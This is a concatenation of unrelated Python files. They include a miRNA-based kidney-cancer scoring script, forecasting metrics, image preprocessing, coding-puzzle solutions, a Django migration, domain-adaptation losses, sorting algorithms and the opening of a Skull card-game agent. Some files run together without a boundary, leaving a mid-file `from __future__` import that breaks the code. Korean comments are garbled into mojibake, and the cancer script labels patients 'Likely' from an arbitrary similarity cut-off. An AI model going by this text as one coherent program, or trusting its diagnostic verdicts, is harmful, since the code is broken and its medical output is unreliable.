isKidney = ""             # verdict label; reassigned inside likelyTable()
similarityThreshold = 80  # percent similarity needed to report "Likely"
#Finds top 50 mirna for each person and places in map corresponding to likely possiblity of someone with kidney disease having that mirna based on standardized data
def createPatientDict(arr, result):
    """Fill the global patientMax with likelihood scores for this patient.

    arr is the patient's ppm column, result the parallel list of miRNA
    names.  The top `topmiRNAHits` miRNAs by ppm are looked up in the
    standardized cohort data (allMaxesPruned); each gets the fraction of
    diseased people carrying it, or 0 when unknown.
    """
    global patientMax, topmiRNAHits, allMaxesPruned, maxPeople
    arr1 = np.copy(arr)
    # BUGFIX: xrange(1, topmiRNAHits) visited only 49 entries although the
    # stated intent is the top 50; iterate the full count.  (xrange and
    # dict.has_key were also Python-2-only.)
    for _ in range(topmiRNAHits):
        # Index of the current largest ppm; zero it out for the next pass.
        tIndex = int(np.argmax(arr1))
        arr1[tIndex] = 0
        name = result[tIndex]
        if name in allMaxesPruned:
            patientMax[name] = allMaxesPruned[name] / maxPeople
        else:
            patientMax[name] = 0
#Score is calculated by adding up the likelihood or percentage of having a mirna that is included in both standardized data set and new patient data set
def createScore(prunedMap, people):
    """Return the maximum attainable similarity score.

    Sums, over every miRNA in the standardized map, the fraction of the
    cohort (`people`) carrying it.
    """
    return sum((count / people for count in prunedMap.values()), 0.0)
#Reads data from each test patient and creates dictionary including top 50 mirna based on ppm of mirna
#Map created with patient name and similarity score
def getPatientScore():
    """Score every test patient file under testPerson/.

    Each file is read twice: once via np.loadtxt for the numeric ppm
    column, once line-by-line for the miRNA names (first tab field).
    createPatientDict() then fills the global patientMax, whose values
    are summed into that patient's similarity score.

    Returns a dict mapping file path -> similarity score.
    """
    scoreMap = {}
    global patientMax
    for filename in glob.glob('testPerson/*.txt'):
        patientMax = {}  # reset per patient; createPatientDict repopulates it
        ppm = None
        result = None
        f = open(filename)
        f.readline()  # skip the header
        data = np.loadtxt(f, usecols=(1, 2))
        ppm = data[:, 0]  # first loaded column is the ppm values
        f.close()
        # Second pass over the same file to collect the miRNA names.
        f = open(filename)
        f.readline()
        lines = f.readlines()
        result = []
        for x in lines:
            result.append(x.split('\t')[0])
        createPatientDict(ppm, result)
        # The patient's score is the sum of the per-miRNA likelihoods.
        patientScore = 0.0
        for each in patientMax:
            patientScore += patientMax[each]
        scoreMap[filename] = patientScore
    return scoreMap
#Creates table with patient id, similarity score to standardized data set, and likelihood of cancer
def likelyTable(patientScores):
    """Print patient id, similarity (percent of maxScore) and a verdict.

    Uses the module-global maxScore (set by main()) as the denominator
    and similarityThreshold as the "Likely" cut-off.
    (Python 2 print statements -- left untouched.)
    """
    print '{:<40}{:>45}{:>45}'.format("Patient ID", "Similarity Score", "Kidney Cancer Probability")
    for each in patientScores:
        global similarityThreshold
        similarity = patientScores[each] / maxScore * 100.0
        if similarity >= similarityThreshold:
            isKidney = "Likely"
        else:
            isKidney = "Unlikely"
        # each[11:] strips the leading 'testPerson/' directory prefix.
        print '{:<40}{:>45}{:>45}'.format(each[11:], similarity, isKidney)
def main():
    """Score all test patients, then print the likelihood table.

    Note the ordering: the global maxScore must be assigned before
    likelyTable() runs, because likelyTable divides by it.
    """
    global allMaxesPruned, maxPeople, maxScore
    patientScores = getPatientScore()
    maxScore = createScore(allMaxesPruned, maxPeople)
    likelyTable(patientScores)
main()
|
import plotly.plotly as py
import plotly.graph_objs as go
import pandas as pd
import numpy as np
# Load the arrivals dataset and index it by arrival date.
# NOTE(review): hard-coded absolute path -- only works on the author's machine.
df = pd.read_excel('/Users/bounouamustapha/Desktop/work/all_data.xlsx')
df.index = df['DATE_ARRIVEE']
del df['DATE_ARRIVEE']  # the date now lives in the index; drop the column
def mean_absolute_error(y_true, y_pred):
    """Return the mean absolute error between two equal-length sequences."""
    true_arr = np.array(y_true)
    pred_arr = np.array(y_pred)
    return np.mean(np.abs(true_arr - pred_arr))
def symetrique_mean_absolute_percentage_error(y_true, y_pred):
    """Return the symmetric MAPE in percent (range 0..200).

    Uses |t - p| / (p + t) per element, averaged and scaled by 200.
    """
    true_arr = np.array(y_true)
    pred_arr = np.array(y_pred)
    ratios = np.abs((true_arr - pred_arr) / (pred_arr + true_arr))
    return np.mean(ratios) * 200
#
#
# Server Side Modules image manipulation
#
#
from __future__ import print_function
import os
import math
import logging
from sklearn.cross_validation import train_test_split
from sklearn.datasets import fetch_lfw_people
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.decomposition import RandomizedPCA
from sklearn.svm import SVC
import numpy as np
from PIL import Image
def singleImage2nparray(imagePath, imageSize):
    '''
    Load one image and return it as a flat (1, width*height) nparray.

    Images whose base name starts with 'piPic' come from a roof-mounted
    pi and arrive upside down, so they are rotated 180 degrees.
    '''
    target_shape = (1, imageSize[0] * imageSize[1])
    img = Image.open(imagePath)
    # Downsize to the working resolution.
    img = img.resize(imageSize, Image.ANTIALIAS)
    if os.path.basename(imagePath).startswith('piPic'):
        img = img.rotate(180)
    # Greyscale first, then 32-bit integer pixels.
    img = img.convert('L').convert('I')
    flat = np.array(img).flatten()
    return np.reshape(flat, target_shape)
def images2nparray(imageDir, imageSize, yFlag):
    '''
    Convert every image in imageDir into rows of a feature matrix.

    Returns (X, y, names): X is (n, width*height), y repeats yFlag once
    per image, names lists the files in load order.
    '''
    print(imageDir)
    # Drop hidden files such as '.DS_Store'.
    names = [entry for entry in os.listdir(imageDir) if not entry.startswith('.')]
    print('Clean Contents ' + str(names))
    n_features = imageSize[0] * imageSize[1]
    X = np.empty((0, n_features))
    y = np.empty((0,))
    for name in names:
        print('Image: ' + str(name) + ' is coded ' + str(yFlag))
        row = singleImage2nparray(imageDir + name, imageSize)
        X = np.append(X, row, axis=0)
        y = np.append(y, yFlag)
    return (X, y, names)
def createTrainingSetByWindow(imagePath,
                              windowSize=(40,80),
                              overlap=(0.5,0.5),
                              cropBox=(80,40,160,200),
                              invertImage=False,
                              debug=False
                              ):
    '''
    Move a window across an image, and create a set of cropped images
    to be used as training set elements

    imagePath:   source image; crops are saved next to it as
                 <imagePath>_<step>.jpg
    windowSize:  (width, height) of the sliding window, pixels
    overlap:     fractional overlap between successive windows (hor, ver)
    cropBox:     region of the source to scan, as a PIL crop box
    invertImage: rotate the source 180 degrees first (roof-mounted pi)
    debug:       additionally display each crop on screen

    Returns the final step counter; step starts at 1 and is incremented
    before each save, so the return value is 1 + the number of crops.
    '''
    leftCornerHor = 0
    leftCornerVer = 0
    w = windowSize[0]
    h = windowSize[1]
    ovlapHor = overlap[0]
    ovlapVer = overlap[1]
    i = Image.open(imagePath)
    # Downsize
    ## Rotate if pi mounted upside down
    if invertImage:
        i = i.rotate(180)
    ## Crop
    isub = i.crop(cropBox)
    imageWidth,imageHeight = isub.size
    step = 1
    y_pred = -1  # NOTE(review): unused leftover from a classification pass
    # Scan window over rows first...
    while (leftCornerVer+h <= imageHeight):
        # Then columns
        while (leftCornerHor+w <= imageWidth):
            # print('Step '+str(step)+' '+str(leftCornerHor)+' '+str(leftCornerVer),' ',str(w),str(h))
            step = step + 1
            ic = isub.crop( (int(leftCornerHor),int(leftCornerVer),
                             int(leftCornerHor+w),
                             int(leftCornerVer+h)) )
            # if y_pred == 1:
            if debug:
                ic.show()
            ic.convert('RGB').save((imagePath+'_'+str(step)+'.jpg'))
            # Move window: advance by the non-overlapping fraction of the width.
            leftCornerHor += math.ceil(float(w)*(1.0-ovlapHor))
        # After completing a row move down one row and repeat
        leftCornerHor = 0.
        leftCornerVer += math.ceil(float(h)*(1.0-ovlapVer))
    return step
def writeDataSets(X, y, xFileName='X.csv', yFileName='y.csv', imageNameList=None,
                  nameFileName='Names.csv'):
    """Write the feature matrix X and label vector y as CSV files.

    Each row of X becomes one comma-separated line of xFileName and each
    label in y one line of yFileName.  If imageNameList is given, the
    image file names are written one per line to nameFileName.
    """
    # `with` guarantees the files are closed even when a write raises
    # (the original left files open on error).
    with open(xFileName, 'w') as xFile:
        for row in X:
            s = ''
            for value in row:
                s += str(value) + ', '
            xFile.write(s + '\n')
    with open(yFileName, 'w') as yFile:
        for label in y:
            yFile.write(str(label) + '\n')
    # BUGFIX: the original used the Python-2-only `<>` operator, a syntax
    # error on Python 3 (which this file targets via print_function).
    # Identity comparison with None is the correct spelling.
    if imageNameList is not None:
        with open(nameFileName, 'w') as nameFile:
            for name in imageNameList:
                nameFile.write(name + '\n')
    return
if __name__ == "__main__":
    # Dataset location and file structure.
    # NOTE(review): hard-coded absolute paths -- machine-specific.
    trainingDir = '/Users/andy/Documents/Software/imageProcessing/TrainingSet/'
    testDir = '/Users/andy/Documents/Software/imageProcessing/TestSet/'
    positiveSubDir = 'positive/'
    negativeSubDir = 'negative/'
    # Final image size fed to algorithm
    # imageSize = (200,200)
    imageSize = (40,80)
    ####################################
    ####################################
    ## Create training set: positives coded +1, negatives coded -1.
    Xp,yp,imageNamesp = images2nparray(trainingDir+positiveSubDir,imageSize,1)
    Xn,yn,imageNamesn = images2nparray(trainingDir+negativeSubDir,imageSize,-1)
    X = np.append(Xp,Xn, axis=0)
    y = np.append(yp,yn, axis=0)
    fileNames = imageNamesp+imageNamesn
    writeDataSets(X,y,imageNameList=fileNames)
    print('Success, wrote X.csv, Y.csv, and Names.csv')
    ## Create test set, written to separate files.
    Xp_test,yp_test,imageNamesp_test = images2nparray(testDir+positiveSubDir,
                                                      imageSize,1)
    Xn_test,yn_test,imageNamesn_test = images2nparray(testDir+negativeSubDir,
                                                      imageSize,-1)
    print('Xp_test shape = '+str(Xp_test.shape))
    X_test = np.append(Xp_test,Xn_test, axis=0)
    y_test = np.append(yp_test,yn_test, axis=0)
    fileNames_test = imageNamesp_test + imageNamesn_test
    writeDataSets(X_test,y_test,'Xtest.csv','yTest.csv',
                  imageNameList=fileNames_test,nameFileName='NamesTest.csv')
|
# https://codility.com/programmers/task/missing_integer
def main():
    """Exercise solution() on the examples from the problem statement."""
    print(solution([1,3,6,4,1,2])) # 5
    print(solution([1])) # 2
def solution(A):
    """Return the smallest positive integer missing from A.

    O(n) time / O(n) space: the answer can only be in 1..len(A)+1, so a
    set-membership scan over that range suffices.
    """
    numbers = set(A)
    # BUGFIX: xrange is Python-2-only and raises NameError on Python 3
    # (the rest of this file already uses the print() function).
    for candidate in range(1, len(A) + 1):
        if candidate not in numbers:
            return candidate
    # All of 1..len(A) are present, so the answer is the next integer.
    return len(A) + 1
# Run the examples when executed as a script.
if __name__ == "__main__":
    main()
# Generated by Django 4.0.5 on 2022-08-01 19:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration adding the Time model.

    NOTE(review): generated by Django 4.0.5 -- normally left untouched.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('accounts', '0017_level_created_livedata_created_player_created_and_more'),
    ]

    operations = [
        migrations.CreateModel(
            name='Time',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('time', models.IntegerField()),
                ('position', models.IntegerField()),
                # T1*/T2* look like per-team position slots (LW/C/RW/LD/RD/G)
                # -- presumably hockey line-ups; confirm with the app models.
                ('T1LW', models.CharField(blank=True, max_length=50)),
                ('T1C', models.CharField(blank=True, max_length=50)),
                ('T1RW', models.CharField(blank=True, max_length=50)),
                ('T1LD', models.CharField(blank=True, max_length=50)),
                ('T1RD', models.CharField(blank=True, max_length=50)),
                ('T1G', models.CharField(blank=True, max_length=50)),
                ('T2LW', models.CharField(blank=True, max_length=50)),
                ('T2C', models.CharField(blank=True, max_length=50)),
                ('T2RW', models.CharField(blank=True, max_length=50)),
                ('T2LD', models.CharField(blank=True, max_length=50)),
                ('T2RD', models.CharField(blank=True, max_length=50)),
                ('T2G', models.CharField(blank=True, max_length=50)),
                # SET_NULL keeps Time rows when the related game/user is deleted.
                ('game', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.game')),
                ('lines', models.ManyToManyField(to='accounts.line')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import math
import torch.nn.functional as F
import pdb
# Domain Confusion Loss
def Entropy(input_):
    """Per-sample Shannon entropy of a batch of probability rows.

    input_ is (batch, classes); returns a (batch,) tensor.  A small
    epsilon guards log(0).
    """
    eps = 1e-5
    per_class = -input_ * torch.log(input_ + eps)
    return per_class.sum(dim=1)
def grl_hook(coeff):
    """Return a gradient hook implementing a gradient-reversal layer.

    The hook multiplies incoming gradients by -coeff (on a clone, so the
    original gradient tensor is untouched).
    """
    def reverse(grad):
        return grad.clone() * (-coeff)
    return reverse
def CDAN(input_list, ad_net, entropy=None, coeff=None, random_layer=None):
    """Conditional Domain Adversarial Network loss.

    input_list is [features, softmax_outputs] for a batch assumed to be
    first-half source / second-half target.  ad_net is the domain
    discriminator.  With `entropy` given, samples are re-weighted by
    prediction certainty (CDAN+E) and `coeff` scales the reversed
    gradient; `random_layer` switches to the randomized multilinear map.
    NOTE(review): requires CUDA (dc_target is built with .cuda()).
    """
    softmax_output = input_list[1].detach()  # no gradients through classifier probs
    feature = input_list[0]
    if random_layer is None:
        # Multilinear conditioning: outer product of predictions and features.
        op_out = torch.bmm(softmax_output.unsqueeze(2), feature.unsqueeze(1))
        ad_out = ad_net(op_out.view(-1, softmax_output.size(1) * feature.size(1)))
    else:
        random_out = random_layer.forward([feature, softmax_output])
        ad_out = ad_net(random_out.view(-1, random_out.size(1)))
    batch_size = softmax_output.size(0) // 2
    # Domain labels: 1 for the source half, 0 for the target half.
    dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
    if entropy is not None:
        # Reverse gradients flowing back through the entropy weights.
        entropy.register_hook(grl_hook(coeff))
        # Certainty weight: low entropy -> weight close to 2, high -> close to 1.
        entropy = 1.0+torch.exp(-entropy)
        source_mask = torch.ones_like(entropy)
        source_mask[feature.size(0)//2:] = 0
        source_weight = entropy*source_mask
        target_mask = torch.ones_like(entropy)
        target_mask[0:feature.size(0)//2] = 0
        target_weight = entropy*target_mask
        # Normalise each half's weights before combining.
        weight = source_weight / torch.sum(source_weight).detach().item() + \
                 target_weight / torch.sum(target_weight).detach().item()
        return torch.sum(weight.view(-1, 1) * nn.BCELoss(reduction='none')(ad_out, dc_target)) / torch.sum(weight).detach().item()
    else:
        return nn.BCELoss()(ad_out, dc_target)
def DANN(features, ad_net):
    """Standard DANN domain-adversarial loss.

    Assumes the first half of the batch is source (label 1) and the
    second half target (label 0).  NOTE: builds labels on CUDA.
    """
    domain_pred = ad_net(features)
    half = domain_pred.size(0) // 2
    domain_labels = np.array([[1]] * half + [[0]] * half)
    dc_target = torch.from_numpy(domain_labels).float().cuda()
    return nn.BCELoss()(domain_pred, dc_target)
def RSL(source,target,k=1):
    """Spectral loss between source and target feature batches.

    Penalises the distance between the two batches' singular-value
    spectra, after squaring the k smallest source singular values
    (a BSS-style suppression of the least-transferable components).
    NOTE(review): torch.svd returns (U, S, V), so despite the names the
    singular *values* land in `u` (source) and `l` (target); the abs()
    below is applied to singular vectors and only affects their sign in
    backprop.  Assumes source and target yield equally many singular
    values -- torch.norm(u_new - l) would fail otherwise; confirm with
    callers.
    """
    ns, nt = source.size(0), target.size(0)
    d = source.size(1)  # NOTE(review): immediately overwritten below; unused
    # Compute singular values of layers output
    d, u,v = torch.svd(source)
    r, l,s = torch.svd(target)
    # Control sign of singular vectors in backprob.
    d,v,r,s= torch.abs(d),torch.abs(v),torch.abs(r),torch.abs(s)
    u_k = u[:-k]  # all source singular values except the k smallest
    #BSS with Spectral loss
    u_n = torch.pow(u[-k:],2)  # square (shrink) the k smallest
    u_new = torch.cat([u_k,u_n])
    # Compute Spectral loss, normalised by the source batch size.
    loss = torch.norm(u_new-l)
    loss = loss / ns
    return loss
def BSP(feature_s, feature_t):
    """Batch Spectral Penalization term.

    Returns the sum of the squared largest singular values of the source
    and target feature matrices.
    """
    top_s = torch.svd(feature_s)[1][0]
    top_t = torch.svd(feature_t)[1][0]
    return top_s ** 2 + top_t ** 2
def compute_a_distance(method,input_list,ad_net,random_layer=None):
    """Estimate the Proxy A-distance from the domain discriminator's error.

    Builds the discriminator input the same way as training (multilinear
    map for CDAN-style methods, raw features otherwise), thresholds the
    discriminator output at 0.5, and converts the resulting domain
    classification error into A-distance = 2 * (1 - 2 * err).
    NOTE(review): requires CUDA and assumes the batch is half source /
    half target, in that order.
    """
    softmax_output = input_list[1].detach()
    feature = input_list[0]
    if "CDAN" in method:
        if random_layer is None:
            op_out = torch.bmm(softmax_output.unsqueeze(2), feature.unsqueeze(1))
            ad_out = ad_net(op_out.view(-1, softmax_output.size(1) * feature.size(1)))
        else:
            random_out = random_layer.forward([feature, softmax_output])
            ad_out = ad_net(random_out.view(-1, random_out.size(1)))
    else:
        ad_out = ad_net(feature)
    batch_size = softmax_output.size(0) // 2
    # Domain labels: 1 = source half, 0 = target half.
    dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
    predict = (ad_out >0.5).type(torch.int)
    error = torch.sum((predict.float() != dc_target).type(torch.int)) / float(dc_target.size(0))
    # Error is symmetric around 0.5: fold it so the distance is non-negative.
    if error > .5:# https://github.com/jindongwang/transferlearning/blob/master/code/distance/proxy_a_distance.py
        error = 1. - error
    a_distance = 2*(1-2*error)
    return a_distance
# log_str = "iter: {:05d}, evaluation_accuracy: {:.5f}, RSL: {:.5f}, domain_loss: {:.5f}, classifer_loss: {:.5f}".format(i, temp_acc,rsl_loss_value,transfer_loss_value,classifier_loss_value)
|
"""Advent of Code Day 20 - Particle Swarm"""
import re
import collections
def make_dict():
    """Parse input.txt into {particle_number: (position, velocity, acceleration)}.

    Each line holds three <x,y,z> vectors; each vector becomes a list of ints.
    """
    with open('input.txt') as f:
        lines = [line.strip() for line in f.readlines()]
    particles = {}
    for num, line in enumerate(lines):
        p, v, a = re.findall(r'<(-?\d+),(-?\d+),(-?\d+)>', line)
        particles[num] = ([int(x) for x in p],
                          [int(x) for x in v],
                          [int(x) for x in a])
    return particles
def find_closest():
    """Simulate until one particle has been nearest the origin for 200 straight ticks.

    Mutates the module-global particle_dict in place (positions and
    velocities advance every tick).  Returns the winning particle number.
    """
    history = [10000]  # dummy seed so the very first window check cannot trigger
    while True:
        best_dist, best_num = 1000000, None
        for num, (pos, vel, acc) in particle_dict.items():
            # Advance one tick: velocity += acceleration, position += velocity.
            for axis in range(3):
                vel[axis] += acc[axis]
                pos[axis] += vel[axis]
            dist = sum(abs(coord) for coord in pos)
            if dist < best_dist:
                best_dist, best_num = dist, num
        history.append(best_num)
        # Stable winner over the last 200 ticks -> done.
        if len(set(history[-200:])) == 1:
            return history[-1]
def collisions():
    """Advance the swarm, deleting particles that share a position; return survivors.

    Runs a fixed 1000 ticks (ample for the remaining particles to have
    diverged), mutating the module-global particle_dict in place.
    """
    for _tick in range(1000):
        position_count = collections.defaultdict(int)
        for info in particle_dict.values():
            for axis in range(3):
                info[1][axis] += info[2][axis]
                info[0][axis] += info[1][axis]
            position_count[tuple(info[0])] += 1
        # Positions occupied by more than one particle this tick.
        crowded = [pos for pos, count in position_count.items() if count > 1]
        collided = [num for num, info in particle_dict.items()
                    if tuple(info[0]) in crowded]
        for num in collided:
            del particle_dict[num]
    return len(particle_dict)
if __name__ == '__main__':
    particle_dict = make_dict()
    # Answer One
    print("The particle that will stay closest to 0,0,0:", find_closest())
    # Re-parse: find_closest() mutated the particle positions in place.
    particle_dict = make_dict()
    # Answer Two
    print("Number of particles that remain after collisions:", collisions())
|
class Solution:
    def topKFrequent(self, nums, k):
        """
        Return the k most frequent elements of nums via bucket sort.

        Runs in O(n log n) worst case (sorting the distinct counts);
        ties within a count keep first-seen order.

        :type nums: List[int]
        :type k: int
        :rtype: List[int]
        """
        # Count how many times each number occurs.
        frequency = {}
        for num in nums:
            frequency[num] = frequency.get(num, 0) + 1
        # Group numbers by their occurrence count.
        bucket = {}
        for num, count in frequency.items():
            bucket.setdefault(count, []).append(num)
        # Collect numbers from the highest count downward until we have k.
        top_k = []
        for count in sorted(bucket, reverse=True):
            for num in bucket[count]:
                if len(top_k) >= k:
                    return top_k
                top_k.append(num)
        return top_k
if __name__ == '__main__':
    # Smoke test: a single element with k == 1 must return that element.
    nums = [1]
    k = 1
    res = Solution().topKFrequent(nums, k)
    print(res)
|
# 10, 5, 7, 21, 4, 8, 18 ๋ก ๊ตฌ์ฑ๋๋ ๋ฆฌ์คํธ๋ฅผ ์์ฑํ์ฌ listnum์ ์ ์ฅํ๋ค.
# Build the list 10, 5, 7, 21, 4, 8, 18 and store it in listnum.
listnum = [10, 5, 7, 21, 4, 8, 18]
# Find and print the minimum value stored in listnum.
# The minimum is computed with explicit control flow, deliberately
# without using a built-in helper such as min().
min_value = listnum[0]
for i in range(1, len(listnum)) :
    if min_value > listnum[i] :
        min_value = listnum[i]
print('์ต์๊ฐ :', min_value)
#############
# Notes #
# Lesson 15 #
#############
def add_to_index(index, keyword, url):
    """File url under keyword in index, a list of [keyword, [urls]] pairs."""
    for pair in index:
        if pair[0] == keyword:
            pair[1].append(url)
            return
    # Keyword not present yet: start a new entry.
    index.append([keyword, [url]])
def lookup(index, keyword):
    """Return the list of urls filed under keyword, or [] when absent."""
    for pair in index:
        if pair[0] == keyword:
            return pair[1]
    return []
def add_page_to_index(index, url, content):
    """Index every whitespace-separated word of content under url."""
    for word in content.split():
        add_to_index(index, word, url)
'''
Latency - time it takes message to get from source to destination (usually measured in milliseconds 1000 milliseconds = 1 second)
Bandwidth - amount of information that can be transmitted per unit time (bits per second or million bits per second mbps)
What is a bit?
1 bit = smallest unit of information
As Brione points out, questions like this about how much information one bit conveys and what
are the best questions to ask to get the most information are the heart of Information Theory.
''' |
class BubbleSort(object):
    """In-place exchange sort comparing every pair (i, j) with i < j."""

    def sort(self, num):
        """Sort num in place in ascending order."""
        n = len(num)
        for left in range(n):
            for right in range(left + 1, n):
                if num[left] > num[right]:
                    num[left], num[right] = num[right], num[left]
class SelectionSort(object):
    """In-place selection sort: swap the minimum of the unsorted tail to the front."""

    def sort(self, num):
        """Sort num in place in ascending order."""
        for pos in range(len(num)):
            smallest = pos
            for candidate in range(pos + 1, len(num)):
                if num[candidate] < num[smallest]:
                    smallest = candidate
            num[pos], num[smallest] = num[smallest], num[pos]
class InsertionSort(object):
    """In-place insertion sort."""

    def sort(self, num):
        """Sort num in place, growing a sorted prefix one element at a time."""
        for i in range(1, len(num)):
            key = num[i]
            j = i - 1
            # BUGFIX: test j >= 0 *before* indexing num[j].  The original
            # evaluated `key < num[j]` first, so with j == -1 it silently
            # read the list's last element via negative indexing before
            # the bounds guard stopped the loop.
            while j >= 0 and key < num[j]:
                num[j + 1] = num[j]
                j -= 1
            num[j + 1] = key
class QuickSort(object):
    """Recursive quicksort with Lomuto partitioning, sorting in place."""

    def sort(self, num, front, end):
        """Sort num[front..end] (inclusive bounds) in place."""
        if front < end:
            split = self.partition(num, front, end)
            self.sort(num, front, split - 1)
            self.sort(num, split + 1, end)

    def partition(self, num, front, end):
        """Partition num[front..end] around num[end]; return the pivot's final index."""
        pivot = num[end]
        boundary = front - 1  # last index of the < pivot region
        for cursor in range(front, end):
            if num[cursor] < pivot:
                boundary += 1
                num[cursor], num[boundary] = num[boundary], num[cursor]
        # Drop the pivot just after the < region.
        boundary += 1
        num[boundary], num[end] = num[end], num[boundary]
        return boundary
class MergeSort(object):
    """Top-down merge sort using infinity sentinels during the merge."""

    def sort(self, num, front, end):
        """Sort num[front..end] (inclusive bounds) in place."""
        if front < end:
            mid = (front + end) // 2
            self.sort(num, front, mid)
            self.sort(num, mid + 1, end)
            self.merge(num, front, mid, end)

    def merge(self, num, front, mid, end):
        """Merge the sorted halves num[front..mid] and num[mid+1..end]."""
        left = num[front:mid + 1] + [float('inf')]
        right = num[mid + 1:end + 1] + [float('inf')]
        li = ri = 0
        for write in range(front, end + 1):
            # Strict < keeps the original's tie behaviour: equal elements
            # are taken from the right half first.
            if left[li] < right[ri]:
                num[write] = left[li]
                li += 1
            else:
                num[write] = right[ri]
                ri += 1
class HeapSort(object):
    """In-place heapsort: build a max-heap, then repeatedly move the root to the end."""

    def sort(self, num):
        """Sort num in place in ascending order."""
        self.buildHeap(num)
        heap_size = len(num)
        while heap_size > 1:
            # Current maximum goes to the end of the shrinking heap.
            num[heap_size - 1], num[0] = num[0], num[heap_size - 1]
            heap_size -= 1
            self.maxHeapify(num, 0, heap_size)

    def buildHeap(self, num):
        """Turn num into a max-heap by sifting down every internal node."""
        i = len(num) // 2
        while i >= 0:
            self.maxHeapify(num, i, len(num))
            i -= 1

    def maxHeapify(self, num, idx, length):
        """Sift num[idx] down within num[:length] to restore the max-heap property."""
        largest = idx
        leftIdx = idx * 2 + 1
        rightIdx = idx * 2 + 2
        if leftIdx < length and num[leftIdx] > num[idx]:
            largest = leftIdx
        if rightIdx < length and num[rightIdx] > num[largest]:
            largest = rightIdx
        if largest != idx:
            num[idx], num[largest] = num[largest], num[idx]
            # BUGFIX: the original recursed on the module-level global
            # `nums` instead of the `num` parameter, so sorting any list
            # not literally named `nums` was broken (it only worked in
            # this file's test harness by accident).
            self.maxHeapify(num, largest, length)
class RadixSort(object):
    """LSD radix sort (base 10) for non-negative integers.

    `d` is the largest digit weight to process: passes run for
    weight = 1, 10, 100, ... while weight <= d.
    """

    def sort(self, num, d):
        """Sort num in place, doing one counting pass per digit weight."""
        size = len(num)
        buckets = [[0] * size for _ in range(10)]
        counts = [0] * 10
        weight = 1
        while weight <= d:
            # Distribute values into buckets keyed by the current digit.
            for value in num:
                digit = (value // weight) % 10
                buckets[digit][counts[digit]] = value
                counts[digit] += 1
            # Gather back in digit order and clear the counters.
            out = 0
            for digit in range(10):
                for slot in range(counts[digit]):
                    num[out] = buckets[digit][slot]
                    out += 1
                counts[digit] = 0
            weight *= 10
if __name__ == "__main__":
    # Self-test harness: each sorter is exercised on small lists and the
    # result checked in place.
    obj = BubbleSort()
    nums = [4, 2, 6, 1]
    obj.sort(nums)
    assert (nums == [1, 2, 4, 6])
    nums = [4, 24, 6, 1, 17, 3, 89, 43, 45]
    obj.sort(nums)
    assert (nums == [1, 3, 4, 6, 17, 24, 43, 45, 89])
    q = QuickSort()
    nums = [4, 2, 6, 1, 7, 3]
    q.sort(nums, 0, 5)
    assert (nums == [1, 2, 3, 4, 6, 7])
    nums = [4, 24, 6, 1, 17, 3, 89, 43, 45]
    q.sort(nums, 0, 8)
    assert (nums == [1, 3, 4, 6, 17, 24, 43, 45, 89])
    isort = InsertionSort()
    nums = [4, 2, 6, 1, 7, 3]
    isort.sort(nums)
    assert (nums == [1, 2, 3, 4, 6, 7])
    m = MergeSort()
    nums = [4, 2, 6, 1, 7, 3]
    m.sort(nums, 0, 5)
    assert nums == [1, 2, 3, 4, 6, 7]
    s = SelectionSort()
    nums = [4, 2, 6, 1, 7, 3]
    s.sort(nums)
    assert nums == [1, 2, 3, 4, 6, 7]
    # NOTE(review): HeapSort.maxHeapify recurses on the global name `nums`;
    # this test only passes because the sorted list happens to BE that
    # global.  Sorting any other list would misbehave.
    h = HeapSort()
    nums = [4, 2, 6, 1, 7, 3]
    h.sort(nums)
    assert nums == [1, 2, 3, 4, 6, 7]
    r = RadixSort()
    nums = [4, 2, 6, 1, 7, 3]
    r.sort(nums, 1)
    assert nums == [1, 2, 3, 4, 6, 7]
    nums = [73, 22, 93, 43, 55, 14, 28, 65, 39, 81, 33, 100]
    r.sort(nums, 100)
    assert nums == [14, 22, 28, 33, 39, 43, 55, 65, 73, 81, 93, 100]
|
import numpy as np
from random import *
from multiprocessing import Process, Pipe
from names import *
import math
names = ['Mickael','Thierry','Georges','Antoine']
def format_state(state):
    """Flatten an observation dict into a 1-D numpy feature vector.

    Removes the HAS_HIDDEN / NBR_CARDS / BET entries first (note: this
    mutates the caller's dict), then walks every remaining value and
    flattens up to two levels of nesting into floats.  The bare excepts
    implement duck-typed flattening: scalar vs list vs list-of-lists.
    """
    del state['HAS_HIDDEN']
    del state['NBR_CARDS']
    del state['BET']
    new_state = []
    for v in state.values():
        try:
            # v is iterable: flatten one level ...
            for x in v:
                try: new_state.append(float(x))
                except :
                    # ... or two levels for nested lists (e.g. FRONTS).
                    for y in x: new_state.append(float(y))
        except: new_state.append(float(v))  # v is a plain scalar
    state = np.asarray(new_state)
    return state
class Card:
    """One skull-or-flower card with a hidden/revealed table state."""

    # -1 -> not on the table, 0 -> face down, 1 -> flower, 2 -> skull
    dic = {-1: 'EMPY', 0: 'HIDDEN', 1: 'FLOWER', 2: 'SKULL'}

    def __init__(self, value):
        self.state = -1       # what opponents can currently see
        self.value = value    # the card's true face

    def __str__(self, public=1):
        # Public view shows the visible state; private view the true face.
        code = self.state if public else self.value
        return Card.dic[code]
# Global registry of every possible Action, ordered by Action.index.
actions = []
class Action:
    """One legal move in the action space: a (type, value, global index) triple."""

    def __init__(self, typ, value, index):
        self.type = typ
        self.value = value
        self.index = index
        actions.append(self)  # self-register on construction

    def gen_actions():
        """Build the 22-entry action space: 2 CARD, 16 BET, 1 ABANDON, 3 SHOW."""
        counter = 0
        for value in range(2):
            Action('CARD', value, counter)
            counter += 1
        for value in range(16):
            Action('BET', value, counter)
            counter += 1
        Action('ABANDON', 0, counter)
        counter += 1
        for value in range(3):
            Action('SHOW', value, counter)
            counter += 1
Action.gen_actions()
class Player:
    """One Skull player: hand (pocket), table cards (frontCards), score,
    and the bookkeeping fields used to build the model's observation."""

    # Class-level cursor handing out seat indexes 0..3 at construction.
    index = 0

    def reset(self):
